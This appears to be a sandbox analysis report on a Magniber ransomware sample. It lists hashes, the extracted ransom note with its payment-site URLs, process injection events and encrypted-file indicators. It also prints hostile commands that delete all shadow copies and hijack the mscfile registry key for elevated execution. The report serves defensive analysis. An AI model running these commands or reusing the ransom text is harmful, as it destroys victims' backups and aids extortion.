magniber | 10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e

Analysis

max time kernel
132s
max time network
166s
platform
windows7_x64
resource
win7-20220414-en
submitted
02-05-2022 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.bin.dll
Size

21KB
MD5

a60c5212d52fe1488d2f82989a2947d2
SHA1

0a744d6c76902d28eb6687d66c18b0a354f29b9d
SHA256

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e
SHA512

afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://a69cc2c044642c00edihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://a69cc2c044642c00edihlxbl.uponmix.xyz/dihlxbl http://a69cc2c044642c00edihlxbl.flysex.space/dihlxbl http://a69cc2c044642c00edihlxbl.partscs.site/dihlxbl http://a69cc2c044642c00edihlxbl.codehes.uno/dihlxbl Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://a69cc2c044642c00edihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl

http://a69cc2c044642c00edihlxbl.uponmix.xyz/dihlxbl

http://a69cc2c044642c00edihlxbl.flysex.space/dihlxbl

http://a69cc2c044642c00edihlxbl.partscs.site/dihlxbl

http://a69cc2c044642c00edihlxbl.codehes.uno/dihlxbl

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1292	1532	cmd.exe	42
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	1532	vssadmin.exe	42
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	620	1532	vssadmin.exe	42
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1264	1532	vssadmin.exe	42
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1496	1532	cmd.exe	42
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	892	1532	vssadmin.exe	42

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

taskhost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\StepRead.tiff => C:\Users\Admin\Pictures\StepRead.tiff.dihlxbl	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SuspendEnable.tif => C:\Users\Admin\Pictures\SuspendEnable.tif.dihlxbl	taskhost.exe
File renamed	C:\Users\Admin\Pictures\CopyConvertTo.png => C:\Users\Admin\Pictures\CopyConvertTo.png.dihlxbl	taskhost.exe
File renamed	C:\Users\Admin\Pictures\GetConfirm.png => C:\Users\Admin\Pictures\GetConfirm.png.dihlxbl	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SendUnpublish.png => C:\Users\Admin\Pictures\SendUnpublish.png.dihlxbl	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\StepRead.tiff	taskhost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

rundll32.exe

description	pid	Process	procid_target
PID 2012 set thread context of 1116	2012	rundll32.exe	20
PID 2012 set thread context of 1180	2012	rundll32.exe	19
PID 2012 set thread context of 1212	2012	rundll32.exe	18

Interacts with shadow copies 2 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
1584	vssadmin.exe
620	vssadmin.exe
1264	vssadmin.exe
892	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{349C3B51-CA3B-11EC-AE54-7EE61918B1DD} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "358276608"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Modifies registry class 11 IoCs

Processes:

taskhost.exeDwm.exerundll32.exeExplorer.EXE

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\mscfile	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
1812	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
2012	rundll32.exe
2012	rundll32.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

rundll32.exe

pid	Process
2012	rundll32.exe
2012	rundll32.exe
2012	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEWMIC.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	1212	Explorer.EXE
Token: SeShutdownPrivilege	1212	Explorer.EXE
Token: SeShutdownPrivilege	1212	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1156	WMIC.exe
Token: SeSecurityPrivilege	1156	WMIC.exe
Token: SeTakeOwnershipPrivilege	1156	WMIC.exe
Token: SeLoadDriverPrivilege	1156	WMIC.exe
Token: SeSystemProfilePrivilege	1156	WMIC.exe
Token: SeSystemtimePrivilege	1156	WMIC.exe
Token: SeProfSingleProcessPrivilege	1156	WMIC.exe
Token: SeIncBasePriorityPrivilege	1156	WMIC.exe
Token: SeCreatePagefilePrivilege	1156	WMIC.exe
Token: SeBackupPrivilege	1156	WMIC.exe
Token: SeRestorePrivilege	1156	WMIC.exe
Token: SeShutdownPrivilege	1156	WMIC.exe
Token: SeDebugPrivilege	1156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1156	WMIC.exe
Token: SeRemoteShutdownPrivilege	1156	WMIC.exe
Token: SeUndockPrivilege	1156	WMIC.exe
Token: SeManageVolumePrivilege	1156	WMIC.exe
Token: 33	1156	WMIC.exe
Token: 34	1156	WMIC.exe
Token: 35	1156	WMIC.exe
Token: SeShutdownPrivilege	1212	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1268	WMIC.exe
Token: SeSecurityPrivilege	1268	WMIC.exe
Token: SeTakeOwnershipPrivilege	1268	WMIC.exe
Token: SeLoadDriverPrivilege	1268	WMIC.exe
Token: SeSystemProfilePrivilege	1268	WMIC.exe
Token: SeSystemtimePrivilege	1268	WMIC.exe
Token: SeProfSingleProcessPrivilege	1268	WMIC.exe
Token: SeIncBasePriorityPrivilege	1268	WMIC.exe
Token: SeCreatePagefilePrivilege	1268	WMIC.exe
Token: SeBackupPrivilege	1268	WMIC.exe
Token: SeRestorePrivilege	1268	WMIC.exe
Token: SeShutdownPrivilege	1268	WMIC.exe
Token: SeDebugPrivilege	1268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1268	WMIC.exe
Token: SeRemoteShutdownPrivilege	1268	WMIC.exe
Token: SeUndockPrivilege	1268	WMIC.exe
Token: SeManageVolumePrivilege	1268	WMIC.exe
Token: 33	1268	WMIC.exe
Token: 34	1268	WMIC.exe
Token: 35	1268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1156	WMIC.exe
Token: SeSecurityPrivilege	1156	WMIC.exe
Token: SeTakeOwnershipPrivilege	1156	WMIC.exe
Token: SeLoadDriverPrivilege	1156	WMIC.exe
Token: SeSystemProfilePrivilege	1156	WMIC.exe
Token: SeSystemtimePrivilege	1156	WMIC.exe
Token: SeProfSingleProcessPrivilege	1156	WMIC.exe
Token: SeIncBasePriorityPrivilege	1156	WMIC.exe
Token: SeCreatePagefilePrivilege	1156	WMIC.exe
Token: SeBackupPrivilege	1156	WMIC.exe
Token: SeRestorePrivilege	1156	WMIC.exe
Token: SeShutdownPrivilege	1156	WMIC.exe
Token: SeDebugPrivilege	1156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1156	WMIC.exe
Token: SeRemoteShutdownPrivilege	1156	WMIC.exe
Token: SeUndockPrivilege	1156	WMIC.exe
Token: SeManageVolumePrivilege	1156	WMIC.exe
Token: 33	1156	WMIC.exe
Token: 34	1156	WMIC.exe
Token: 35	1156	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exeExplorer.EXE

pid	Process
1860	iexplore.exe
1212	Explorer.EXE
1212	Explorer.EXE

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid	Process
1212	Explorer.EXE
1212	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid	Process
1860	iexplore.exe
1860	iexplore.exe
1452	IEXPLORE.EXE
1452	IEXPLORE.EXE
1452	IEXPLORE.EXE
1452	IEXPLORE.EXE

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
1212	Explorer.EXE

Suspicious use of WriteProcessMemory 61 IoCs

Processes:

taskhost.execmd.exeDwm.execmd.execmd.execmd.exeCompMgmtLauncher.exeCompMgmtLauncher.execmd.exeExplorer.EXEcmd.execmd.exerundll32.exeCompMgmtLauncher.execmd.execmd.exeCompMgmtLauncher.exeiexplore.exe

description	pid	Process	procid_target
PID 1116 wrote to memory of 1812	1116	taskhost.exe	28
PID 1116 wrote to memory of 1812	1116	taskhost.exe	28
PID 1116 wrote to memory of 1812	1116	taskhost.exe	28
PID 1116 wrote to memory of 268	1116	taskhost.exe	33
PID 1116 wrote to memory of 268	1116	taskhost.exe	33
PID 1116 wrote to memory of 268	1116	taskhost.exe	33
PID 1116 wrote to memory of 1168	1116	taskhost.exe	32
PID 1116 wrote to memory of 1168	1116	taskhost.exe	32
PID 1116 wrote to memory of 1168	1116	taskhost.exe	32
PID 1168 wrote to memory of 1156	1168	cmd.exe	34
PID 1168 wrote to memory of 1156	1168	cmd.exe	34
PID 1168 wrote to memory of 1156	1168	cmd.exe	34
PID 1180 wrote to memory of 1588	1180	Dwm.exe	35
PID 1180 wrote to memory of 1588	1180	Dwm.exe	35
PID 1180 wrote to memory of 1588	1180	Dwm.exe	35
PID 1588 wrote to memory of 1268	1588	cmd.exe	37
PID 1588 wrote to memory of 1268	1588	cmd.exe	37
PID 1588 wrote to memory of 1268	1588	cmd.exe	37
PID 1056 wrote to memory of 1400	1056	cmd.exe	43
PID 1940 wrote to memory of 1252	1940	cmd.exe	44
PID 1056 wrote to memory of 1400	1056	cmd.exe	43
PID 1056 wrote to memory of 1400	1056	cmd.exe	43
PID 1940 wrote to memory of 1252	1940	cmd.exe	44
PID 1940 wrote to memory of 1252	1940	cmd.exe	44
PID 1400 wrote to memory of 664	1400	CompMgmtLauncher.exe	45
PID 1400 wrote to memory of 664	1400	CompMgmtLauncher.exe	45
PID 1400 wrote to memory of 664	1400	CompMgmtLauncher.exe	45
PID 1252 wrote to memory of 552	1252	CompMgmtLauncher.exe	46
PID 1252 wrote to memory of 552	1252	CompMgmtLauncher.exe	46
PID 1252 wrote to memory of 552	1252	CompMgmtLauncher.exe	46
PID 268 wrote to memory of 1860	268	cmd.exe	49
PID 268 wrote to memory of 1860	268	cmd.exe	49
PID 268 wrote to memory of 1860	268	cmd.exe	49
PID 1212 wrote to memory of 896	1212	Explorer.EXE	50
PID 1212 wrote to memory of 896	1212	Explorer.EXE	50
PID 1212 wrote to memory of 896	1212	Explorer.EXE	50
PID 896 wrote to memory of 1308	896	cmd.exe	52
PID 896 wrote to memory of 1308	896	cmd.exe	52
PID 896 wrote to memory of 1308	896	cmd.exe	52
PID 1292 wrote to memory of 1984	1292	cmd.exe	55
PID 1292 wrote to memory of 1984	1292	cmd.exe	55
PID 1292 wrote to memory of 1984	1292	cmd.exe	55
PID 2012 wrote to memory of 2040	2012	rundll32.exe	56
PID 2012 wrote to memory of 2040	2012	rundll32.exe	56
PID 2012 wrote to memory of 2040	2012	rundll32.exe	56
PID 1984 wrote to memory of 1804	1984	CompMgmtLauncher.exe	59
PID 1984 wrote to memory of 1804	1984	CompMgmtLauncher.exe	59
PID 1984 wrote to memory of 1804	1984	CompMgmtLauncher.exe	59
PID 2040 wrote to memory of 580	2040	cmd.exe	60
PID 2040 wrote to memory of 580	2040	cmd.exe	60
PID 2040 wrote to memory of 580	2040	cmd.exe	60
PID 1496 wrote to memory of 1636	1496	cmd.exe	69
PID 1496 wrote to memory of 1636	1496	cmd.exe	69
PID 1496 wrote to memory of 1636	1496	cmd.exe	69
PID 1636 wrote to memory of 1472	1636	CompMgmtLauncher.exe	72
PID 1636 wrote to memory of 1472	1636	CompMgmtLauncher.exe	72
PID 1636 wrote to memory of 1472	1636	CompMgmtLauncher.exe	72
PID 1860 wrote to memory of 1452	1860	iexplore.exe	77
PID 1860 wrote to memory of 1452	1860	iexplore.exe	77
PID 1860 wrote to memory of 1452	1860	iexplore.exe	77
PID 1860 wrote to memory of 1452	1860	iexplore.exe	77

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.bin.dll,#1
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:580

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1212
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:896
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1308

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1268

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1812
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- C:\Windows\system32\cmd.exe
  cmd /c "start http://a69cc2c044642c00edihlxbl.uponmix.xyz/dihlxbl^&1^&46150740^&88^&363^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://a69cc2c044642c00edihlxbl.uponmix.xyz/dihlxbl&1&46150740&88&363&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1452

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:552

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:664

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1804

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1584

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:620

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1264

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1472

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:796

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:892

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6EWTMXFZ.txt

Filesize
599B

MD5
784c67781b665c4a6bdb003f05fac3fe

SHA1
559c93ff1a901fb54fe482aafb649b0167c1992b

SHA256
f65d2f82634f4323897e8c40f83e9d4913f7bc2df50ca4d8d9316c903016617d

SHA512
69b37d2507a21f6bbcfbdd96d9b4370406e29c5c5eaa2ad38882fd7c734aeac29cda443ed6a185fa49157cce841dddb87dfee0158a0ad94175871c75fd95219d

Download Submit
C:\Users\Admin\Desktop\ConvertDisconnect.mpg.dihlxbl

Filesize
681KB

MD5
45224d9823cd18adb144dbac572d16c8

SHA1
eb5e9a61c5dcfae2e2c9bb78bfc3cd554baef40e

SHA256
1eac82ed04bc42387d798980023fea6f1bb265f6bff4d4cf9ac2d078cc0724b1

SHA512
c0f6f589602feedef434b07733292a8043011f2715732550728abae529501123323626eca62b956e2507f7c8b325ceaaa7f20681478f6167c52ddec7714278b9

Download Submit
C:\Users\Admin\Desktop\ExitReceive.dotm.dihlxbl

Filesize
385KB

MD5
016c2ec2cac601480f7825fa00c8488f

SHA1
3507cdb2e509d9fe309c7d2b79b7938ef6e4d543

SHA256
9e449976dfdca8c16ea413edd0c8dea5697dd7843ead5cc70993e2401669c686

SHA512
03c4ecd0e1be1da47cebab4d0daccf3ec76506a53fe49d8dc79ea8bf9e7022b29bf8841e4f62f86d5577b49668b76264b90b98dc136bdb810a20bb7367dd364b

Download Submit
C:\Users\Admin\Desktop\GroupCompress.jfif.dihlxbl

Filesize
503KB

MD5
f539a846f223a8af5c514f164c1c455b

SHA1
d9909a82fbd5e79c37acbcbb8107e9be50d9eba2

SHA256
0ac63fbbcedef39b80e82deecd80ff6e6fb9b92fe018b042d930ba4cb04d7590

SHA512
1b88028275b38229a56c5608342170af3f5b5466ce5857bb28c6282cd052216ed4fdb40d70a4dfb180d3b4d66d411c9da82ba5722327196e7953c6364933c575

Download Submit
C:\Users\Admin\Desktop\InitializeReceive.mpg.dihlxbl

Filesize
711KB

MD5
40fee1d207efa8ee603827ca62b388b6

SHA1
52f52cde0e2ed85a79424d54a1fb8d913ae99add

SHA256
0725ca595be0b54da322d46ad25f6148a412c1b4a06c34b747c27d87511c70e6

SHA512
834a53a6d9bae646aaae2722e8141f68d687b536d6ee440330d5978f029e07babb327bc385b6258ad01371688e30091527fe656db7e9255605b7ed1eddb52b47

Download Submit
C:\Users\Admin\Desktop\MergeInstall.asf.dihlxbl

Filesize
829KB

MD5
66148018b50901a0f9b4b25f292b9c5d

SHA1
077b230e489d210f355adc78e78524d613a358f7

SHA256
f5c49f60d95c67e167776f7dbc91ca56bde13f915239d2c782c2809f25c53fc2

SHA512
a54aa9bc79e85b1a827b647afb8dee979d43de487885ce5b3e0b5e3d271733a2e6e829e47c8a57d184caf8c900adb14069a2ee8ba1106fbf14b08b1960e30486

Download Submit
C:\Users\Admin\Desktop\PushExport.jpg.dihlxbl

Filesize
800KB

MD5
d3cf31276e712661d9913e0ba20b20f4

SHA1
787bd6b1cd96010efb680457cb1340e4eb31cd0e

SHA256
32445cdc3958d36ce0d2ba28c0b46b2ef79981f9cb6dfe5382db7e47cfc3dac2

SHA512
